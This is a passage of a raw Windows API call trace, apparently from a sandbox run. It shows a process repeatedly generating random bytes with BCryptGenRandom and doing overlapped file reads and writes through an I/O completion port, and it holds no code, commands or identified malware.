lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.888] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0xc09, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0080.888] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.898] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0xb92, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.898] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.912] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.912] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0080.912] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.913] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.913] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0080.913] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0080.913] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0080.913] free (_Block=0x77d800) [0080.913] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0080.913] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0080.914] free (_Block=0x1ff1930) [0080.914] free (_Block=0x1ff1a40) [0080.914] free (_Block=0x77d908) [0080.914] WriteFile (in: hFile=0x3b4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0080.914] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.926] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.927] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.927] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0080.927] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.928] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.928] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0080.928] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0080.928] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0080.928] free (_Block=0x77d800) [0080.928] calloc (_Count=0x41, _Size=0x4) returned 0x2031ed0 [0080.928] calloc (_Count=0x82, _Size=0x4) returned 0x2031fe0 [0080.929] free (_Block=0x2031ed0) [0080.929] free (_Block=0x2031fe0) [0080.929] free (_Block=0x77d908) [0080.929] WriteFile (in: hFile=0x3c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0080.929] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.942] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.942] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.942] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0080.942] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.943] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.943] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0080.943] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0080.943] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0080.943] free (_Block=0x77d800) [0080.943] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0080.943] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0080.944] free (_Block=0x1ff1930) [0080.944] free (_Block=0x1ff1a40) [0080.944] free (_Block=0x77d908) [0080.944] WriteFile (in: hFile=0x3a0, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0080.944] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0080.949] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.949] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0080.950] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0080.950] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0080.950] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0080.950] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0080.950] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0080.950] free (_Block=0x77d800) [0080.951] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0080.951] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0080.951] free (_Block=0x1ff1930) [0080.951] free (_Block=0x1ff1a40) [0080.951] free (_Block=0x77d908) [0080.951] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0080.951] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0081.971] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.971] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.971] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0081.971] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.972] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.972] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0081.975] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.975] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.975] free (_Block=0x77d800) [0081.975] calloc (_Count=0x41, _Size=0x4) returned 0x3db00b8 [0081.975] calloc (_Count=0x82, _Size=0x4) returned 0x3db01c8 [0081.976] free (_Block=0x3db00b8) [0081.976] free (_Block=0x3db01c8) [0081.976] free (_Block=0x77d908) [0081.976] WriteFile (in: hFile=0x3bc, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0081.976] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0081.989] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.989] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.989] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0081.990] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.990] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0081.994] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0081.994] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0081.994] free (_Block=0x77d800) [0081.994] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0081.994] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0081.994] free (_Block=0x1ff1930) [0081.994] free (_Block=0x1ff1a40) [0081.994] free (_Block=0x77d908) [0081.995] WriteFile (in: hFile=0x3b8, lpBuffer=0x3e300ac, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078 | out: lpBuffer=0x3e300ac, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e30078) returned 0x0 [0081.995] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.013] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.014] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0082.014] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.015] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0082.015] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.015] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.015] free (_Block=0x77d800) [0082.015] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.015] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.016] free (_Block=0x1ff1930) [0082.016] free (_Block=0x1ff1a40) [0082.016] free (_Block=0x77d908) [0082.016] WriteFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.016] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.023] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.024] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.024] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0082.024] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.025] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.025] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0082.025] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.025] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.025] free (_Block=0x77d800) [0082.025] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.025] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.026] free (_Block=0x1ff1930) [0082.026] free (_Block=0x1ff1a40) [0082.026] free (_Block=0x77d908) [0082.026] WriteFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.026] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.257] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x12f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.257] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.258] WriteFile (in: hFile=0x3c4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x13e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0082.259] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.260] CloseHandle (hObject=0x3ac) returned 1 [0082.261] free (_Block=0x3db00b8) [0082.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.282] ReadFile (in: hFile=0x3b4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1368, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.283] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.283] CloseHandle (hObject=0x3b4) returned 1 [0082.283] free (_Block=0x1ff1e60) [0082.283] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.300] ReadFile (in: hFile=0x3b8, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x13a1, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 1 [0082.316] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.329] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.330] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0082.330] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.331] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0082.331] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.331] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.331] free (_Block=0x77d800) [0082.331] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.331] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.332] free (_Block=0x1ff1930) [0082.332] free (_Block=0x1ff1a40) [0082.332] free (_Block=0x77d908) [0082.332] WriteFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0082.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.339] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.339] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0082.339] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.340] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0082.344] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.344] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.344] free (_Block=0x77d800) [0082.344] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.344] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.344] free (_Block=0x1ff1930) [0082.344] free (_Block=0x1ff1a40) [0082.344] free (_Block=0x77d908) [0082.344] WriteFile (in: hFile=0x3c4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0082.345] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.377] CloseHandle (hObject=0x3b4) returned 1 [0082.378] free (_Block=0x1ff1e60) [0082.378] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.386] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.387] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0082.387] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.387] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.387] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0082.391] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.391] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.391] free (_Block=0x77d800) [0082.391] calloc (_Count=0x41, _Size=0x4) returned 0x2071f40 [0082.391] calloc (_Count=0x82, _Size=0x4) returned 0x2072050 [0082.391] free (_Block=0x2071f40) [0082.392] free (_Block=0x2072050) [0082.392] free (_Block=0x77d908) [0082.392] WriteFile (in: hFile=0x3c0, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0082.392] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.399] WriteFile (in: hFile=0x3b8, lpBuffer=0x2031f04*, nNumberOfBytesToWrite=0x11e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 1 [0082.399] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.414] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.414] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.414] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0082.414] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.415] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.415] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0082.415] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.415] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.415] free (_Block=0x77d800) [0082.415] calloc (_Count=0x41, _Size=0x4) returned 0x3df0128 [0082.415] calloc (_Count=0x82, _Size=0x4) returned 0x3df0238 [0082.415] free (_Block=0x3df0128) [0082.415] free (_Block=0x3df0238) [0082.415] free (_Block=0x77d908) [0082.415] WriteFile (in: hFile=0x3c4, lpBuffer=0x3d7007c, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 0x0 [0082.416] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.432] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.433] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0082.433] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.433] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.433] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0082.433] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.433] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.433] free (_Block=0x77d800) [0082.433] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1930 [0082.433] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1a40 [0082.434] free (_Block=0x1ff1930) [0082.434] free (_Block=0x1ff1a40) [0082.434] free (_Block=0x77d908) [0082.434] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.434] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0082.435] WriteFile (in: hFile=0x3c4, lpBuffer=0x3d7007c*, nNumberOfBytesToWrite=0x1840, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70048) returned 1 [0082.435] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: 